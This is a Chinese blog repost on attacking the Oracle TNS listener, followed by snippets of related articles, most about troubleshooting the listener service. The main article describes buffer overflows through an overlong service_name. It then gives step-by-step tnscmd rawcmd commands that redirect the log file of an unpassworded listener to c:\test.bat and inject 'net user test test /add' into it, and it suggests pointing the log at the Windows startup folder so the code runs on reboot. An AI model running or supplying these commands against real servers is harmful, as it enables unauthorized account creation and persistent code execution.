oracle攻击的几种方式,针对Oracle的TNSlistener的攻击方法整理

最新推荐文章于 2021-04-12 07:50:32 发布
最新推荐文章于 2021-04-12 07:50:32 发布
阅读量422 收藏
点赞数
文章标签: oracle攻击的几种方式

针对Oracle的TNSlistener的攻击方法整理以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!

fc6fc1e0bbf1f8bf81b53c6e5e674cb9.png

先 根据版本的不同 TNS listener可能较易受到多种类型的缓冲区溢出攻击 这些攻击可以在不提供用户ID和口令的情况下被利用 例如 在oracle i中 当客户机请求某个过长的service_name时 很容易受到溢出攻击 当listener为日志构建错误消息之后 service_name的值会被复制到某于栈结构的缓冲区内 从而引起溢出—覆蓋保存值将返回栈中的地址 这种做法可以使攻击者获得控制权 事实上 TNS listener曾经有过多次溢出和格式化字符串的漏洞

其次 另一类攻击和日志文件有关 只有当未给listener设置口令的时候 攻击才会有效 假设某个listener没有设置口令 攻击方法如下

[Copy to clipboard]CODE:tnscmd h p rawcmd (DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(MAND=log_directory)(ARGUMENTS= )(SERVICE=LISTENER)(VERSION= )(VALUE=c:\\)))

将日志目录设置到C盘

[Copy to clipboard]CODE:tnscmd h p rawcmd (DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(MAND=log_file)(ARGUMENTS= )(SERVICE=LISTENER)(VERSION= )(VALUE=test bat)))

将日志文件设置为test bat

[Copy to clipboard]CODE:tnscmd h rawcmd (CONNECT_DATA=((     ||dir >test txt||net user test test /add))

该命令把dir >test txt net user test test /add命令写入c:\test bat文件 由于双竖线的作用(第一条命令执行失败后 WINDOWS命令解释器执行后面的命令)把错误的信息注释掉 从而可以执行我们提交的命令

通过设置日志文件到不同的目录 例如WINDOWS的启动目录 当服务器重启将执行恶意用户提交的特定代码 从而对系统造成威胁 lishixinzhi/Article/program/Oracle/201311/18311

分页:123

周海棣
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
oracle tnslistener 无法启动,Oracle监听器服务不能启动的解决方法
weixin_39715348的博客
04-03 2283
Oracle监听器服务不启动的时候可采取以下措施予以解决:一、连接主机字符串,提示没有监听器SVRMGR> connect internal/oracle@orcl;ORA-12541: TNS:no listenerSVRMGR>二、运行监听器,提示地址的协议专用组件指定不正确在开始菜单运行中键入lsnrctlLSNRCTL for 32-bit Windows: Version 9...
针对OracleTNS listener攻击原理及方法介绍
07-04
针对OracleTNS listener攻击原理及方法介绍。。。
Oracle TNS Listener
weixin_30249203的博客
05-11 94
原來只裝了個 oracle 9i的client. 後來有需要把server也裝上. 完成後發現怎麼也連不上, 並且services列表裡面找不到 OracleOraHome92TNSListener :-$ 同事告知, 有先例. 給了我一個reg文件:Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SYSTEM\Cu...
oracle tns listener配置 (附TNS介绍)
weixin_34090643的博客
08-22 2017
一、tnsnames.ora用途:(用于客户端)告诉oracle client应该从哪连、连到哪。TEST= (DESCRIPTION= (ADDRESS=(PROTOCOL=TCP)(HOST=ip/hostname)(PORT=1521)) (CONNECT_DATA= #(SERVER=DEDICATED)#...
Oracle中的TNS监听器程序概念及其作用
Profeel的专栏
11-27 3792
Oracle监听器listener是一个重要的数据库服务器组件,在整个Oracle体系结构中,扮演着重要的作用。   监听器Lisener功能   从当前的Oracle版本看,Listener主要负责下面的几方面功能:   1、 监听客户端请求。监听器运行在数据库服务器之上,与Oracle实例(可为多个)相关关联,是一个专门的进程process,在windows
oracle tnslistener 启动,Oracle数据库TNSListener无法启动的解决方案
weixin_39559119的博客
04-12 1011
Oracle数据库的操作中出现了Oracle数据库TNSListener无法启动的现象,由于我的小黑内存只有512M,所以一半oracle的服务都设为手动启动的。今天,突然发现TNSListener服务无法启动,提示从系统无法找到指定路径。于是在网上查了一下,原来是注册表的问题:在控制面板/管理工具/服务中双击打开OracleOraHome92TNSListener的服务看到其“可执行文件的路...
Oracle监听器被优化大师挂掉后的完美解决方法
12-16
Oracle监听器被优化大师挂掉后的解决方法: 在启动oracleorahome90tnslistener服务 时出错,信息: 在本地计算机无法启动oracleorahome90tnslistener服务, 错误3:系统找不到指定路径. 我在网上查资料后,发现一般...
oracle无法启动tnslistener服务
12-29
oracle无法启动tnslistener服务,oracle无法启动tnslistener服务。
Java调用oracle存储过程
12-22
 一、 在数据库创建存储过程的脚本,如果使用的是本地的oracle数据库,则需要开启服务:OracleOraDb11g_home1TNSListenerOracleServiceORCL。  存储过程实现:输入用户的工号,输出用户的名字、薪水和工作。 ...
解决navicat 链接oracle时出现的各种问题
12-16
 方法:在Oracle的安装路径下找到sqlnet.ora文件。(我的安装路径E:\app\sa1\product\12.2.0\dbhome_1\network\admin\sqlnet.ora) 在文件的最后添加SQLNET.ALLOWED_LOGON_VERSION=8就解决了; 2.ORA-12560TNS:...
ORACLE TNS Listener远程注册投毒(Poison Attack)漏洞
热门推荐
Wonderful's DBA Story
06-25 2万+
此次有用户正好大规模安全漏洞扫描后,发现此漏洞,该漏洞存在于Oracle DB的所有版本中,当然10g和11g均中招. Vulnerability Description(漏洞描述) This security alert addresses the security issue CVE-2012-1675, a vulnerability in the TNS listener wh
oracle 启动不了 tnslistener服务启动不了
GeoFuse
10-06 3801
1原因分析 分两种情况,情况A:是安装完oracle后,第一次使用,出现tnslistener服务启动不了;情况B:Oracle一直都可以用,但是突然有一天,因为装卸其他软件或者电脑操作,导致出现了tnslistener服务启动不了。 情况A,多为tnsnames.ora 文件配置错误,需要增加一段话,详细方式参考: tnsnames.ora内容如下 ORCL = (DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.0.
oracle tns和sid,oracle tns listener配置 (附TNS介绍)
weixin_29119497的博客
04-02 1841
一、tnsnames.ora用途:(用于客户端)告诉oracle client应该从哪连、连到哪。TEST=(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=ip/hostname)(PORT=1521))(CONNECT_DATA=#(SERVER=DEDICATED)#这一行可以不加,加上的意思是强制使用专有服务器(S...
oracle tnslistener 无法启动,在本地计算机无法启动OracleOraHome92TNSListener服务
weixin_35618196的博客
04-03 877
昨天我的Oracle用的还好好的,刚才电脑重启下,就出现 “在本地计算机无法启动OracleOraHome92TNSListener服务 ”就无法启动了。怎么会这样,到网上找一下。找到一种方案:打开注册表(regedit)找到HKEY_LOCAL_MACHINE/SYSTEM/CurrentContorlSet/Services/OracleOraHome92TNSListener找到后单击 在...
针对OracleTNS listener的***方法整理
weixin_34004576的博客
10-28 256
Author:poison/amxku 首先,根据版本的不同,TNS listener可能较易受到多种类型的缓冲区溢出***,这些***可以在不提供用户ID和口令的情况下被利用。例如:在oracle 9i中,当客户机请求某个过长的service_name时,很容易受到溢出***。当listener为日志构建错误消息之后,service_name的值会被复制到某于栈结构...
Oracle TNSListener启动后又自动停止解决办法
流浪学习
07-12 1157
TNSListener 服务无法启动,在服务控制台将其启动后,刷新一下,又自动回到停止状态,也没有报任何的错误。而且SPL PLus还可以正常的使用。 http://www.mscto.com 解决方法方法1.直接修改 listener.ora 我机器上的路径是: D:\oracle\product\10.2.0\db_1\NETWORK\ADMIN\list...
服务-》启动ORACLE TNSListener 不成功
iteye_12272的博客
10-14 213
发现一个好贴,顺便粘这:数据库常见问题解决方法 [url]http://blog.csdn.net/hdhai9451/archive/2009/03/04/3957094.aspx[/url] 现象描述:服务-》启动OracleOraDb10g_home1TNSListener,如下图操作: [img]http://dl.iteye.com/upload/attachment/33...
如何攻击oracle,新攻击方法可轻松黑掉Oracle数据库
weixin_29229055的博客
04-12 287
据悉安全研究人员David Litchfield表示,他已经找到了一种新攻击方法,可以黑掉Oracle数据库。David Litchfield声称,这种最新的SQL注入攻击可以获取Oracle服务器的数据库管理员权限,用来删除或者改变数据。在今年2月份华盛顿举行的黑帽大会上他首次透露这种攻击类型,但是本周四,他完全公布了技术细节。SQL注入攻击的常见手法是通过创建特定的数据库查询代码,根据程序返回...
oracle远程投毒漏洞复现,oracle TNS Listener远程投毒(CVE-2012-1675)漏洞分析、复现...
weixin_28896255的博客
04-10 5685
漏洞原理分析:CVE-2012-1675该漏洞产生的原因是因为“TNS Listener”组件中允许攻击者不使用用户名和密码的情况下就变成“自家人”,也就是说攻击者冒充受害者的小弟,但是受害者没有进行任何认证就相信了。然后现在受害者就有两个同名数据库了,监听将自动按照负载均衡把这次访问发送到负载低的数据库上,进行连接访问。然后我们就在连接处开设一个抓包工具就可以抓取受害人向攻击者发送的所有数据了。...
oracle tnslistener
最新发布
06-09
Oracle TNS ListenerOracle数据库中用于接收客户端连接请求的服务程序。它监听来自客户端的连接请求,并根据请求将连接分配给相应的实例。它是Oracle数据库中非常重要的组件之一,因为它能够确保客户端可以与...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值